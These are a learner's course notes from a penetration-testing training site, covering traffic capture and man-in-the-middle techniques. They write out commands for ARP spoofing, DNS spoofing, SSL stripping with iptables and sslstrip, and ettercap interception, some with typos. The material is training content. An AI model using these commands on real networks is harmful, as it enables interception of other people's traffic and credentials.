< All Advanced Penetration Testing Notes

rspeight10 | Advanced Penetration Testing | Module 6 - Traffic Capture

By: rspeight10 | Related Course: Advanced Penetration Testing | Published: May 16, 2017 | Modified: May 16, 2017
Join Cybrary

NotepadAddress Resolution Protocol

Address Resolution Protocol (ARP) it translate the IP address to a MAC address.

ARP spoofing (network switch, gateway)

Tools – Arpspoof

— Logged onto server

arpspoof -i eth0 -t (will have to forward traffic)

cat /proc/sys/net/ipv4/ip_forward has a value of 0,

echo 1 > /proc/sys/net/ivp4/ip_forward – need to change to 1 (which will keep the traffic moving

— Logged onto server

arpspoof -I eth0 -t

sending arp reply’s



arp -a

ftp || ftp-data (wireshark)




NotepadAnalyzing Network Pt. 2

wireshark (network protocol analyzer) captures traffic

turn off promiscuous mode

switch network should niot be able to see other networks

unable to see traffic in plain text (Ftp), to see plain text you will need to reverse engineer


ip.src== || ip.dst==

Domain Controller


wireshark app





DNS (Domain Name Service)

DNS translate www.gmail to its IP address

DNS can be spoofed

DNS Cache Poisoning

dnsspoof -i reth0 -f host.txt

arpspoof -i eth0 -t (gateway)

arpspoof -i eth0 -t (gateway)

dnsspoof -i eth0 -f /root/hosts.txt (listening to dns request and respond accordingly)




NotepadSSL Stripping

SSL Man in the Middle (arpspoof the ipaddress)

enable arpspoofinf

arpspoof -i eth0 -t

enable iptables rules

iptables-t nat -PREROUTING -p tcp –destionation-port 80 -j REDIRECT –to-port 8080

sslstrip -l 8080




NotepadTraffic Capture: ettercap

ettercap is a tool used to break ssl connections (Man-in-the-Middle)

Should use SSL Secure Socket Layer should be used when sending sensitive data cross the network.


ettercap -Ti eth0 -M arp:remote /192/168.1.1 /192/168/1/76

arpspoof -i eth0

arpspoof -i eth0

nano /proc/sys/net/ipv4/ip_forward (got reset back to 0)

echo 1> /proc/sys/net/ipv4/ip_forward (sets ip_forward to 1)

nano /etc/ettercap/etter.conf

In the etter.conf you need to make sure that:  ec_uid and ec_gid are set to 0  and iptables rules are uncommented.

if you use iptables:        

ettercap turns off the ipv4 (resets back to 0)

echo 1> /proc/sys/net/ipv4/ip_forward (sets ip_forward to 1)





< All Advanced Penetration Testing Notes
Join Cybrary

Our Revolution

We believe Cyber Security training should accessible for everyone, everywhere. Everyone deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is the world's largest community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

We recommend always using caution when following any link

Are you sure you want to continue?